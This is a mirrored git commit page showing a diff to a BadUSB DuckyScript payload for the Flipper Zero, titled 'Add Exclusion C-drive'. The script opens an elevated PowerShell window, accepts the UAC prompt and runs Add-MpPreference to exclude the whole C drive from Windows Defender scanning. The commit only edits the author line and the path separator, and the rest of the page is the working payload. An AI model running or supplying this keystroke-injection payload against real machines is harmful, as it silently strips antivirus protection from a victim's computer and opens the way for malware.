mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 12:24:56 -08:00
Update Add Exclusion C-drive.txt
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
REM Title: Add Exclusion C-drive
|
||||
REM Author: @beigeworm
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
|
||||
REM Target: Windows 10
|
||||
|
||||
@@ -16,7 +16,7 @@ ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM add the exclusion path.
|
||||
STRING Add-MpPreference -ExclusionPath C:/
|
||||
STRING Add-MpPreference -ExclusionPath C:\
|
||||
ENTER
|
||||
DELAY 250
|
||||
STRING exit
|
||||
|
||||
Reference in New Issue
Block a user